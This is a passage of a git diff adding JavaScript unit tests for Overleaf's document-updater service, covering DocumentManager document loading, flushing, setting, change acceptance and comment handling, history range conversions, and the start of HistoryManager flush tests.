this.RedisManager.promises.removeDocFromMemory.called.should.equal( + true + ) + }) + }) + }) + }) + + describe('flushDocIfLoaded', function () { + describe('when the doc is in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + }) + await this.DocumentManager.promises.flushDocIfLoaded( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should write the doc lines to the persistence layer', function () { + this.PersistenceManager.promises.setDoc.should.have.been.calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy + ) + }) + }) + + describe('when the document is not in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: null, + version: null, + ranges: null, + }) + await this.DocumentManager.promises.flushDocIfLoaded( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not write anything to the persistence layer', function () { + this.PersistenceManager.promises.setDoc.called.should.equal(false) + }) + }) + }) + + describe('getDocAndRecentOps', function () { + describe('with a previous version specified', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + this.RedisManager.promises.getPreviousDocOps.resolves(this.ops) + this.result = await this.DocumentManager.promises.getDocAndRecentOps( + this.project_id, + this.doc_id, + this.fromVersion + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should get the doc ops', function () { + this.RedisManager.promises.getPreviousDocOps + .calledWith(this.doc_id, this.fromVersion, this.version) + .should.equal(true) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + }) + }) + + describe('with no previous version specified', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + this.RedisManager.promises.getPreviousDocOps.resolves(this.ops) + this.result = await this.DocumentManager.promises.getDocAndRecentOps( + this.project_id, + this.doc_id, + -1 + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not need to get the doc ops', function () { + this.RedisManager.promises.getPreviousDocOps.called.should.equal(false) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ops: [], + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + }) + }) + }) + + describe('getDoc', function () { + describe('when the doc exists in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + historyRangesSupport: this.historyRangesSupport, + }) + this.result = await this.DocumentManager.promises.getDoc( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from Redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: true, + historyRangesSupport: this.historyRangesSupport, + }) + }) + }) + + describe('when the doc does not exist in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: null, + version: null, + ranges: null, + pathname: null, + projectHistoryId: null, + }) + this.PersistenceManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + this.result = await this.DocumentManager.promises.getDoc( + this.project_id, + this.doc_id + ) + }) + + it('should try to get the doc from Redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should get the doc from the PersistenceManager', function () { + this.PersistenceManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should set the doc in Redis', function () { + this.RedisManager.promises.putDocInMemory + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport + ) + .should.equal(true) + }) + + it('should return doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: null, + alreadyLoaded: false, + historyRangesSupport: this.historyRangesSupport, + }) + }) + }) + }) + + describe('setDoc', function () { + describe('with plain tex lines', function () { + beforeEach(function () { + this.beforeLines = ['before', 'lines'] + this.afterLines = ['after', 'lines'] + this.ops = [ + { i: 'foo', p: 4 }, + { d: 'bar', p: 42 }, + ] + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: true, + }) + this.DiffCodec.diffAsShareJsOp.returns(this.ops) + this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves() + this.DocumentManager.promises.flushAndDeleteDoc = sinon + .stub() + .resolves() + }) + + describe('when not loaded but with the same content', function () { + beforeEach(async function () { + this.DiffCodec.diffAsShareJsOp.returns([]) + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: false, + }) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.beforeLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should not apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'noop', + method: 'evict', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush and delete the doc from redis', function () { + this.DocumentManager.promises.flushAndDeleteDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when already loaded with the same content', function () { + beforeEach(async function () { + this.DiffCodec.diffAsShareJsOp.returns([]) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.beforeLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should not apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'noop', + method: 'flush', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush the doc to Mongo', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when already loaded', function () { + beforeEach(async function () { + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should get the current doc lines', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return a diff of the old and new lines', function () { + this.DiffCodec.diffAsShareJsOp + .calledWith(this.beforeLines, this.afterLines) + .should.equal(true) + }) + + it('should apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, { + doc: this.doc_id, + v: this.version, + op: this.ops, + meta: { + type: 'external', + source: this.source, + user_id: this.user_id, + }, + }) + .should.equal(true) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'diff', + method: 'flush', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush the doc to Mongo', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the project history', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal( + false + ) + }) + }) + + describe('when not already loaded', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + pathname: this.pathname, + unflushedTime: null, + alreadyLoaded: false, + }) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should flush and delete the doc from the doc updater', function () { + this.DocumentManager.promises.flushAndDeleteDoc + .calledWith(this.project_id, this.doc_id, {}) + .should.equal(true) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'diff', + method: 'evict', + path: this.source, + }) + .should.equal(true) + }) + + it('should not flush the project history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWithExactly(this.project_id) + .should.equal(true) + }) + }) + + describe('without new lines', function () { + beforeEach(async function () { + await expect( + this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + null, + this.source, + this.user_id, + false, + true + ) + ).to.be.rejectedWith('No lines were provided to setDoc') + }) + + it('should not try to get the doc lines', function () { + this.DocumentManager.promises.getDoc.called.should.equal(false) + }) + }) + + describe('with the undoing flag', function () { + beforeEach(async function () { + // Copy ops so we don't interfere with other tests + this.ops = [ + { i: 'foo', p: 4 }, + { d: 'bar', p: 42 }, + ] + this.DiffCodec.diffAsShareJsOp.returns(this.ops) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + true, + true + ) + }) + + it('should set the undo flag on each op', function () { + this.ops.map(op => op.u.should.equal(true)) + }) + }) + + describe('with the external flag', function () { + beforeEach(async function () { + this.undoing = false + // Copy ops so we don't interfere with other tests + this.ops = [ + { i: 'foo', p: 4 }, + { d: 'bar', p: 42 }, + ] + this.DiffCodec.diffAsShareJsOp.returns(this.ops) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + this.undoing, + true + ) + }) + + it('should add the external type to update metadata', function () { + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, { + doc: this.doc_id, + v: this.version, + op: this.ops, + meta: { + type: 'external', + source: this.source, + user_id: this.user_id, + }, + }) + .should.equal(true) + }) + }) + + describe('without the external flag', function () { + beforeEach(async function () { + this.undoing = false + // Copy ops so we don't interfere with other tests + this.ops = [ + { i: 'foo', p: 4 }, + { d: 'bar', p: 42 }, + ] + this.DiffCodec.diffAsShareJsOp.returns(this.ops) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + this.undoing, + false + ) + }) + + it('should not add the external type to update metadata', function () { + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, { + doc: this.doc_id, + v: this.version, + op: this.ops, + meta: { + source: this.source, + user_id: this.user_id, + }, + }) + .should.equal(true) + }) + }) + }) + }) + + describe('acceptChanges', function () { + beforeEach(function () { + this.change_id = 'mock-change-id' + this.change_ids = [ + 'mock-change-id-1', + 'mock-change-id-2', + 'mock-change-id-3', + 'mock-change-id-4', + ] + this.version = 34 + this.lines = ['original', 'lines'] + this.ranges = { entries: 'mock', comments: 'mock' } + this.updated_ranges = { entries: 'updated', comments: 'updated' } + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + }) + this.RangesManager.acceptChanges.returns(this.updated_ranges) + }) + + describe('successfully with a single change', function () { + beforeEach(async function () { + await this.DocumentManager.promises.acceptChanges( + this.project_id, + this.doc_id, + [this.change_id] + ) + }) + + it("should get the document's current ranges", function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should apply the accept change to the ranges', function () { + this.RangesManager.acceptChanges.should.have.been.calledWith( + this.project_id, + this.doc_id, + [this.change_id], + this.ranges + ) + }) + + it('should save the updated ranges', function () { + this.RedisManager.promises.updateDocument + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + [], + this.updated_ranges, + {} + ) + .should.equal(true) + }) + }) + + describe('successfully with multiple changes', function () { + beforeEach(async function () { + await this.DocumentManager.promises.acceptChanges( + this.project_id, + this.doc_id, + this.change_ids + ) + }) + + it('should apply the accept change to the ranges', function () { + this.RangesManager.acceptChanges + .calledWith( + this.project_id, + this.doc_id, + this.change_ids, + this.ranges + ) + .should.equal(true) + }) + }) + + describe('when the doc is not found', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon + .stub() + .resolves({ lines: null, version: null, ranges: null }) + await expect( + this.DocumentManager.promises.acceptChanges( + this.project_id, + this.doc_id, + [this.change_id] + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + + it('should not save anything', function () { + this.RedisManager.promises.updateDocument.called.should.equal(false) + }) + }) + }) + + describe('getComment', function () { + beforeEach(function () { + this.ranges.comments = [ + { + id: 'mock-comment-id-1', + }, + { + id: 'mock-comment-id-2', + }, + ] + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + }) + }) + + describe('when comment exists', function () { + beforeEach(async function () { + await expect( + this.DocumentManager.promises.getComment( + this.project_id, + this.doc_id, + 'mock-comment-id-1' + ) + ).to.eventually.deep.equal({ + comment: { id: 'mock-comment-id-1' }, + }) + }) + + it("should get the document's current ranges", function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when comment doesnt exists', function () { + beforeEach(async function () { + await expect( + this.DocumentManager.promises.getComment( + this.project_id, + this.doc_id, + 'mock-comment-id-x' + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + + it("should get the document's current ranges", function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when the doc is not found', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon + .stub() + .resolves({ lines: null, version: null, ranges: null }) + await expect( + this.DocumentManager.promises.acceptChanges( + this.project_id, + this.doc_id, + [this.change_id] + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + }) + }) + + describe('deleteComment', function () { + beforeEach(function () { + this.comment_id = 'mock-comment-id' + this.version = 34 + this.lines = ['original', 'lines'] + this.ranges = { comments: ['one', 'two', 'three'] } + this.resolvedCommentIds = ['comment1'] + this.updated_ranges = { comments: ['one', 'three'] } + this.historyRangesSupport = true + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: Date.now() - 1e9, + alreadyLoaded: true, + historyRangesSupport: this.historyRangesSupport, + }) + this.RangesManager.deleteComment.returns(this.updated_ranges) + }) + + describe('successfully', function () { + beforeEach(async function () { + await this.DocumentManager.promises.deleteComment( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id + ) + }) + + it("should get the document's current ranges", function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should delete the comment from the ranges', function () { + this.RangesManager.deleteComment + .calledWith(this.comment_id, this.ranges) + .should.equal(true) + }) + + it('should save the updated ranges', function () { + this.RedisManager.promises.updateDocument + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + [], + this.updated_ranges, + {} + ) + .should.equal(true) + }) + + it('should unset the comment resolved state', function () { + this.RedisManager.promises.updateCommentState.should.have.been.calledWith( + this.doc_id, + this.comment_id, + false + ) + }) + + it('should queue the delete comment operation', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith( + this.project_id, + JSON.stringify({ + pathname: this.pathname, + deleteComment: this.comment_id, + meta: { + ts: new Date(), + user_id: this.user_id, + }, + }) + ) + }) + }) + + describe('when the doc is not found', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon + .stub() + .resolves({ lines: null, version: null, ranges: null }) + await expect( + this.DocumentManager.promises.acceptChanges( + this.project_id, + this.doc_id, + [this.comment_id] + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + + it('should not save anything', function () { + this.RedisManager.promises.updateDocument.called.should.equal(false) + }) + }) + }) + + describe('getDocAndFlushIfOld', function () { + beforeEach(function () { + this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves() + }) + + describe('when the doc is in Redis', function () { + describe('and has changes to be flushed', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + projectHistoryId: this.projectHistoryId, + pathname: this.pathname, + unflushedTime: Date.now() - 1e9, + alreadyLoaded: true, + }) + this.result = await this.DocumentManager.promises.getDocAndFlushIfOld( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + + describe("and has only changes that don't need to be flushed", function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + unflushedTime: Date.now() - 100, + alreadyLoaded: true, + }) + this.result = await this.DocumentManager.promises.getDocAndFlushIfOld( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded.called.should.equal( + false + ) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + }) + + describe('when the doc is not in Redis', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + alreadyLoaded: false, + }) + this.result = await this.DocumentManager.promises.getDocAndFlushIfOld( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded.called.should.equal( + false + ) + }) + + it('should return the lines and versions', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + }) + }) + }) + }) + + describe('renameDoc', function () { + beforeEach(function () { + this.update = 'some-update' + }) + + describe('successfully', function () { + beforeEach(async function () { + await this.DocumentManager.promises.renameDoc( + this.project_id, + this.doc_id, + this.user_id, + this.update, + this.projectHistoryId + ) + }) + + it('should rename the document', function () { + this.RedisManager.promises.renameDoc + .calledWith( + this.project_id, + this.doc_id, + this.user_id, + this.update, + this.projectHistoryId + ) + .should.equal(true) + }) + }) + }) + + describe('resyncDocContents', function () { + describe('when doc is loaded in redis', function () { + beforeEach(async function () { + this.pathnameFromProjectStructureUpdate = '/foo/bar.tex' + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + await this.DocumentManager.promises.resyncDocContents( + this.project_id, + this.doc_id, + this.pathnameFromProjectStructureUpdate + ) + }) + + it('gets the doc contents from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('queues a resync doc content update', function () { + this.ProjectHistoryRedisManager.promises.queueResyncDocContent + .calledWith( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathnameFromProjectStructureUpdate, + this.historyRangesSupport + ) + .should.equal(true) + }) + }) + + describe('when doc is not loaded in redis', function () { + beforeEach(async function () { + this.pathnameFromProjectStructureUpdate = '/foo/bar.tex' + this.RedisManager.promises.getDoc.resolves({}) + this.PersistenceManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + await this.DocumentManager.promises.resyncDocContents( + this.project_id, + this.doc_id, + this.pathnameFromProjectStructureUpdate + ) + }) + + it('tries to get the doc contents from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('gets the doc contents from web', function () { + this.PersistenceManager.promises.getDoc + .calledWith(this.project_id, this.doc_id, { peek: true }) + .should.equal(true) + }) + + it('queues a resync doc content update', function () { + this.ProjectHistoryRedisManager.promises.queueResyncDocContent + .calledWith( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathnameFromProjectStructureUpdate, + this.historyRangesSupport + ) + .should.equal(true) + }) + }) + + describe('when a doc has no ranges in docstore', function () { + beforeEach(async function () { + this.pathnameFromProjectStructureUpdate = '/foo/bar.tex' + this.RedisManager.promises.getDoc.resolves({}) + this.PersistenceManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: undefined, + resolvedCommentIds: [], + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + await this.DocumentManager.promises.resyncDocContents( + this.project_id, + this.doc_id, + this.pathnameFromProjectStructureUpdate + ) + }) + + it('gets the doc contents from web', function () { + this.PersistenceManager.promises.getDoc + .calledWith(this.project_id, this.doc_id, { peek: true }) + .should.equal(true) + }) + + it('queues a resync doc content update with an empty ranges object', function () { + this.ProjectHistoryRedisManager.promises.queueResyncDocContent + .calledWith( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + {}, + [], + this.version, + this.pathnameFromProjectStructureUpdate, + this.historyRangesSupport + ) + .should.equal(true) + }) + }) + }) + + describe('appendToDoc', function () { + describe('sucessfully', function () { + beforeEach(async function () { + this.lines = ['one', 'two', 'three'] + this.DocumentManager.promises.setDoc = sinon + .stub() + .resolves({ rev: '123' }) + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + }) + this.result = await this.DocumentManager.promises.appendToDoc( + this.project_id, + this.doc_id, + ['four', 'five', 'six'], + this.source, + this.user_id + ) + }) + + it('should call setDoc with concatenated lines', function () { + this.DocumentManager.promises.setDoc + .calledWith( + this.project_id, + this.doc_id, + ['one', 'two', 'three', 'four', 'five', 'six'], + this.source, + this.user_id, + false, + false + ) + .should.equal(true) + }) + + it('should return output from setDoc', function () { + this.result.should.deep.equal({ rev: '123' }) + }) + }) + + describe('when doc would become too big', function () { + beforeEach(async function () { + this.Settings.max_doc_length = 100 + this.lines = ['one', 'two', 'three'] + this.DocumentManager.promises.setDoc = sinon + .stub() + .resolves({ rev: '123' }) + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + }) + }) + + it('should fail with FileTooLarge error', async function () { + expect( + this.DocumentManager.promises.appendToDoc( + this.project_id, + this.doc_id, + ['x'.repeat(1000)], + this.source, + this.user_id + ) + ).to.eventually.be.rejectedWith(Errors.FileTooLargeError) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/HistoryConversionsTests.js b/services/document-updater/test/unit/js/HistoryConversionsTests.js new file mode 100644 index 0000000..2bd18c3 --- /dev/null +++ b/services/document-updater/test/unit/js/HistoryConversionsTests.js @@ -0,0 +1,117 @@ +const _ = require('lodash') +const { expect } = require('chai') +const HistoryConversions = require('../../../app/js/HistoryConversions') + +describe('HistoryConversions', function () { + describe('toHistoryRanges', function () { + it('handles empty ranges', function () { + expect(HistoryConversions.toHistoryRanges({})).to.deep.equal({}) + }) + + it("doesn't modify comments when there are no tracked changes", function () { + const ranges = { + comments: [makeComment('comment1', 5, 12)], + } + const historyRanges = HistoryConversions.toHistoryRanges(ranges) + expect(historyRanges).to.deep.equal(ranges) + }) + + it('adjusts comments and tracked changes to account for tracked deletes', function () { + const comments = [ + makeComment('comment0', 0, 1), + makeComment('comment1', 10, 12), + makeComment('comment2', 20, 10), + makeComment('comment3', 15, 3), + ] + const changes = [ + makeTrackedDelete('change0', 2, 5), + makeTrackedInsert('change1', 4, 5), + makeTrackedDelete('change2', 10, 10), + makeTrackedDelete('change3', 21, 6), + makeTrackedDelete('change4', 50, 7), + ] + const ranges = { comments, changes } + + const historyRanges = HistoryConversions.toHistoryRanges(ranges) + expect(historyRanges.comments).to.have.deep.members([ + comments[0], + // shifted by change0 and change2, extended by change3 + enrichOp(comments[1], { + hpos: 25, // 10 + 5 + 10 + hlen: 18, // 12 + 6 + }), + // shifted by change0 and change2, extended by change3 + enrichOp(comments[2], { + hpos: 35, // 20 + 5 + 10 + hlen: 16, // 10 + 6 + }), + // shifted by change0 and change2 + enrichOp(comments[3], { + hpos: 30, // 15 + 5 + 10 + }), + ]) + expect(historyRanges.changes).to.deep.equal([ + changes[0], + enrichOp(changes[1], { + hpos: 9, // 4 + 5 + }), + enrichOp(changes[2], { + hpos: 15, // 10 + 5 + }), + enrichOp(changes[3], { + hpos: 36, // 21 + 5 + 10 + }), + enrichOp(changes[4], { + hpos: 71, // 50 + 5 + 10 + 6 + }), + ]) + }) + }) +}) + +function makeComment(id, pos, length) { + return { + id, + op: { + c: 'c'.repeat(length), + p: pos, + t: id, + }, + metadata: makeMetadata(), + } +} + +function makeTrackedInsert(id, pos, length) { + return { + id, + op: { + i: 'i'.repeat(length), + p: pos, + }, + metadata: makeMetadata(), + } +} + +function makeTrackedDelete(id, pos, length) { + return { + id, + op: { + d: 'd'.repeat(length), + p: pos, + }, + metadata: makeMetadata(), + } +} + +function makeMetadata() { + return { + user_id: 'user-id', + ts: new Date().toISOString(), + } +} + +function enrichOp(commentOrChange, extraFields) { + const result = _.cloneDeep(commentOrChange) + Object.assign(result.op, extraFields) + return result +} diff --git a/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js b/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js new file mode 100644 index 0000000..2fd019d --- /dev/null +++ b/services/document-updater/test/unit/js/HistoryManager/HistoryManagerTests.js @@ -0,0 +1,291 @@ +/* eslint-disable + mocha/no-nested-tests, +*/ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../../app/js/HistoryManager' +) + +describe('HistoryManager', function () { + beforeEach(function () { + this.HistoryManager = SandboxedModule.require(modulePath, { + requires: { + request: (this.request = {}), + '@overleaf/settings': (this.Settings = { + apis: { + project_history: { + url: 'http://project_history.example.com', + }, + }, + }), + './DocumentManager': (this.DocumentManager = {}), + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './Metrics': (this.metrics = { inc: sinon.stub() }), + }, + }) + this.project_id = 'mock-project-id' + this.callback = sinon.stub() + }) + + describe('flushProjectChangesAsync', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }) + + this.HistoryManager.flushProjectChangesAsync(this.project_id) + }) + + it('should send a request to the project history api', function () { + this.request.post + .calledWith({ + url: `${this.Settings.apis.project_history.url}/project/${this.project_id}/flush`, + qs: { background: true }, + }) + .should.equal(true) + }) + }) + + describe('flushProjectChanges', function () { + describe('in the normal case', function () { + beforeEach(function (done) { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }) + this.HistoryManager.flushProjectChanges( + this.project_id, + { + background: true, + }, + done + ) + }) + + it('should send a request to the project history api', function () { + this.request.post + .calledWith({ + url: `${this.Settings.apis.project_history.url}/project/${this.project_id}/flush`, + qs: { background: true }, + }) + .should.equal(true) + }) + }) + + describe('with the skip_history_flush option', function () { + beforeEach(function (done) { + this.request.post = sinon.stub() + this.HistoryManager.flushProjectChanges( + this.project_id, + { + skip_history_flush: true, + }, + done + ) + }) + + it('should not send a request to the project history api', function () { + this.request.post.called.should.equal(false) + }) + }) + }) + + describe('recordAndFlushHistoryOps', function () { + beforeEach(function () { + this.ops = ['mock-ops'] + this.project_ops_length = 10 + + this.HistoryManager.flushProjectChangesAsync = sinon.stub() + }) + + describe('with no ops', function () { + beforeEach(function () { + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + [], + this.project_ops_length + ) + }) + + it('should not flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal(false) + }) + }) + + describe('with enough ops to flush project changes', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps = 